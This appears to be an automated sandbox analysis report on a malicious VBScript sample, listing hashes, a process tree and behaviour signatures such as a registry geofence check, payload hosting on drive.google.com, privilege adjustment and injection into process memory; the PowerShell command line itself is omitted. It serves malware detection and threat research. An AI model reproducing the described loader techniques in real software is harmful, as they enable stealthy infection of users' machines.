Analysis
max time kernel: 148s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 02-05-2024 06:59
Static task: static1
Behavioral task: behavioral1
  Sample: 20220830_ProtecoPTE..vbs
  Resource: win7-20240220-en
Behavioral task: behavioral2
  Sample: 20220830_ProtecoPTE..vbs
  Resource: win10v2004-20240426-en
General
Target: 20220830_ProtecoPTE..vbs
Size: 34KB
MD5: 928637e9b64c9425fde7ca14e03aa101
SHA1: 337201a455c055b2d79360bfb67ba81dbe64c4b0
SHA256: fbbb12ff0da331f5eba7d3745ba7d2e0184e175176b316c373c461b047f7ba8e
SHA512: 5e34714a6b051073222ef2aa8bba45b50ab020bb875ee23057ae91508043badca490542b331c2ca5699f53db283a9399228da4e430fd06b42d3ec20c2fcd4b35
SSDEEP: 768:iE/pRPD/VQHfE5kAZ6/PEAJPPvv/P4WNHeCSwFbwv21ov3dT8IcXRQ/Ua9Sr1TjT:iupRPD/yHfakAZ6/PEAJPPX/P4WVeCSm
Malware Config
Signatures

Blocklisted process makes network request (3 IoCs)
  flow  pid   Process
  2     344   WScript.exe
  5     4792  powershell.exe
  8     4792  powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  description: Key value queried
  ioc: \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation
  Process: WScript.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow  ioc
  4     drive.google.com
  5     drive.google.com

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  4792  powershell.exe
  4792  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description: Token: SeDebugPrivilege
  pid: 4792
  Process: powershell.exe

Suspicious use of WriteProcessMemory (4 IoCs)
  description                        pid   Process         procid_target
  PID 344 wrote to memory of 4792    344   WScript.exe     84
  PID 344 wrote to memory of 4792    344   WScript.exe     84
  PID 4792 wrote to memory of 1904   4792  powershell.exe  87
  PID 4792 wrote to memory of 1904   4792  powershell.exe  87
Processes

C:\Windows\System32\WScript.exe (tree depth 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20220830_ProtecoPTE..vbs"
  - Blocklisted process makes network request
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 344
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 2)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[obfuscated PowerShell command line omitted]"
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 4792

C:\Windows\system32\cmd.exe (tree depth 3)
  Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Breastweed.Qui && echo $"
  PID: 1904
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82